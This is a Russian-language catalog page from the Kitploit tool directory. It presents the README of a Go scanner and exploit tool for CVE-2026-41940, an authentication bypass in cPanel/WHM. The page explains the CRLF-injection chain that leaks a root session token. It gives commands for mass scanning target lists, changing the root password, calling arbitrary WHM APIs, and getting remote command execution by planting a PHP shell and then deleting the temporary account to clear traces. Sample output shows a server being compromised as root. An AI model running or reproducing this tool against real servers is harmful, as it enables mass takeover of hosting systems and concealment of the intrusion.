Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cPanelWHM-AuthBypass — Go-сканер и эксплойт-инструмент для CVE-2026-41940, обхода аутентификации в cPanel/WHM. Поддерживает массовое сканирование, утечку токенов и действия после эксплуатации, такие как RCE, смена пароля и вызовы API. | Kitploit
Инструменты/GitHubGitHub/kagantua/cpanelwhm-authbypass
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Go-сканер и эксплойт-инструмент для CVE-2026-41940, обхода аутентификации в cPanel/WHM. Поддерживает массовое сканирование, утечку токенов и действия после эксплуатации, такие как RCE, смена пароля и вызовы API.

Репозиторий
107145 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cPanel/WHM Auth Bypass Scanner & Exploit Tool

Инструмент командной строки на Go, переписанный на основе Python PoC от watchTowr, для обнаружения и эксплуатации уязвимости обхода аутентификации CVE-2026-41940 в cPanel/WHM.

Обзор уязвимости

CVE-2026-41940 — это уязвимость обхода аутентификации в cPanel/WHM, где цепочка атак через CRLF-инъекцию в заголовок Basic Auth приводит к утечке токена безопасности и получению root-доступа к WHM.

Цепочка атак из 4 этапов:

  1. Предварительная аутентификация — отправка неверных учетных данных на /login/ для получения исходного cookie whostmgrsession
  2. CRLF-инъекция — внедрение символов новой строки через заголовок Authorization: Basic, чтобы заставить сервер раскрыть токен безопасности cpsess в заголовке Location при 307-редиректе
  3. Распространение токена — вызов do_token_denied для распространения внедренных данных аутентификации из исходного хранилища в кэш
  4. Проверка прав — использование раскрытого токена для доступа к /json-api/version и проверки получения root-прав

Возможности

  • Пакетное сканирование — массовое обнаружение целей из файла с параллельным выполнением
  • Проверка одной цели — быстрая проверка по указанному URL
  • Умная обработка URL — автоматическая совместимость с http://, https://, форматом без протокола, автоматическая дедупликация
  • Эксплуатация уязвимости
    • Смена root-пароля (-passwd)
    • Вызов произвольного WHM API (-api)
    • Генерация URL для входа в один клик (-session)
    • Удаленное выполнение команд / RCE (-cmd)
  • Подсветка в терминале — [VULN] красным, [SAFE] зеленым
  • Сохранение результатов — URL уязвимых целей автоматически сохраняются в файл

Сборка

# Требуется Go 1.20+
cd cpanel-checker
go build -o cpanel-checker .

Использование

Обзор параметров

ПараметрОписаниеПример
-uURL одной цели-u https://1.2.3.4:2087
-fФайл со списком URL-f targets.txt
-oПуть к выходному файлу (по умолчанию result.txt)-o vuln.txt
-cКоличество одновременных проверок (по умолчанию 10)-c 20
-hostnameУказать заголовок Host вручную (по умолчанию автоопределение)-hostname cpanel.example.com
-passwdСменить root-пароль (только режим -u)-passwd NewP@ss123
-apiВызвать функцию WHM API (только режим -u)-api listaccts
-api-paramsПараметры WHM API, через запятую-api-params user=root,password=123
-sessionСгенерировать URL входа root в один клик (только режим -u)-session
-keepНе удалять временную учетную запись RCE (в сочетании с -cmd)-keep
-cmdВыполнить удаленную команду / RCE (только режим -u)-cmd "id"

1. Проверка одной цели

./cpanel-checker -u https://target:2087

Порт по умолчанию — 2087, следующие записи эквивалентны:

./cpanel-checker -u https://target
./cpanel-checker -u target

2. Пакетное сканирование

./cpanel-checker -f targets.txt -c 20

targets.txt поддерживает следующие форматы (по одному на строку, строки, начинающиеся с #, — комментарии):

https://1.1.1.1:2087
http://2.2.2.2:2087
3.3.3.3:2087
4.4.4.4
# это комментарий
  • Автоматическая дедупликация: http://1.1.1.1 и https://1.1.1.1 считаются одной целью, сканируются один раз
  • Адреса без протокола автоматически дополняются до https://
  • Адреса без порта автоматически используют 2087
  • Результаты сохраняются в result.txt (можно изменить через -o)

3. Смена root-пароля

./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"

4. Вызов произвольного WHM API

# Список всех учетных записей
./cpanel-checker -u https://target:2087 -api listaccts

# Вызов с параметрами
./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"

5. Генерация URL входа в один клик

./cpanel-checker -u https://target:2087 -session

Выводится URL, открыв который в браузере, вы попадете в панель управления WHM. В панели используйте функцию Terminal для получения интерактивной root-оболочки.

Примечание: -session — полуавтоматический — после генерации URL входа инструментом, вам нужно вручную открыть его в браузере.

6. Удаленное выполнение команд (RCE)

./cpanel-checker -u https://target:2087 -cmd "id"

Добавьте -keep, чтобы сохранить временную учетную запись для входа в панель cPanel:

./cpanel-checker -u https://target:2087 -cmd "id" -keep

При использовании -keep вывод будет содержать имя пользователя, пароль и адрес входа в cPanel (https://host:2083) временной учетной записи — используйте эти учетные данные для входа в панель cPanel.

-cmd — полностью автоматический, не требует ручных действий. Внутренний процесс:

  1. Использование обхода аутентификации для получения root-прав
  2. Создание временной учетной записи cPanel через WHM API
  3. Запись PHP-шелла в ~/public_html/ через UAPI (Fileman::save_file_content)
  4. Выполнение команд через HTTP-запрос к https://host/~tmpuser/shell.php
  5. Возврат вывода команды
  6. Автоматическое удаление временной учетной записи (очистка следов)

Предварительное условие: порт 80 или 443 цели должен быть доступен, и Apache/httpd должен работать.

7. Комбинированное использование

Несколько параметров эксплуатации можно использовать одновременно:

# Одновременно получить URL входа, выполнить команду и сменить пароль
./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"

8. Ручное указание заголовка Host

Когда IP-адрес цели не совпадает с именем хоста, настроенным в cPanel, его можно указать вручную:

./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com

По умолчанию инструмент автоматически определяет правильное имя хоста через 307-редирект /openid_connect/cpanelid.

Пример вывода

Пакетное сканирование

[1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
[2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
[3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
[4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
[5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched

========== Сканирование завершено ==========
Всего: 5 | Уязвимых: 2

  ● https://1.1.1.1:2087
  ● https://4.4.4.4:2087

[+] Результаты сохранены в result.txt

Выполнение RCE

[*] Цель: https://target:2087
[*] Режим: эксплуатация

[0] hostname = cpanel.example.com
[1] minting a preauth session...
    session base = abc123def456
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    leaked token = /cpsess1234567890
[3] firing do_token_denied to propagate raw -> cache...
    gadget fired
[4] verifying we're WHM root...
[+] Получены root-права WHM

[*] Выполнение удаленной команды (RCE)...
    [a] Создание временной учетной записи: tmpabcde
    [b] Запись шелла: /home/tmpabcde/public_html/random.php
    [c] Выполнение команды: id
    [d] Удаление временной учетной записи: tmpabcde
[+] Вывод команды:
uid=0(root) gid=0(root) groups=0(root)

[+] Готово. https://target:2087 скомпрометирован

Примечания

  • Параметры эксплуатации (-passwd, -api, -session, -cmd) доступны только в режиме одной цели -u, не поддерживаются в пакетном режиме -f
  • Инструмент по умолчанию пропускает проверку TLS-сертификатов
  • Таймаут запроса — 15 секунд
  • Строки, начинающиеся с # в файле URL, игнорируются

Отказ от ответственности

Скачать инструмент